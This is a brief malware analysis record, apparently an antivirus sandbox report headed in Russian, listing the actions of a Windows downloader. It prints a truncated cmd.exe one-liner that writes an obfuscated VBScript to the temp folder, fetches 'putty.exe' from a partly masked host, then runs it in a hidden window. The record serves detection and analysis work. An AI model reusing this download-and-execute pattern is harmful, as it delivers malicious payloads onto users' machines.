Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO V8i= "http://www.sh###luxury.com/Direct/putty.exe">>U3o.VBS &@ECHO S5e = L8u("uzyy~Sj}j")>>U3o.VBS &@ECHO Set H5g = CreateObject(L8u("rx}rqWS}rqmyyu"))>>U3o.VBS &@ECHO H5g....
- %TEMP%\u3o.vbs
- %TEMP%\putty.exe
- %TEMP%\u3o.vbs
- http://www.sh###luxury.com/Direct/putty.exe
- DNS ASK sh###luxury.com
- '<SYSTEM32>\wscript.exe' "%TEMP%\U3o.VBS"
- '%TEMP%\putty.exe'
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO V8i= "http://www.sh###luxury.com/Direct/putty.exe">>U3o.VBS &@ECHO S5e = L8u("uzyy~Sj}j")>>U3o.VBS &@ECHO Set H5g = CreateObject(L8u("rx}rqWS}rqmyyu"))>>U3o.VBS &@ECHO H5g....' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13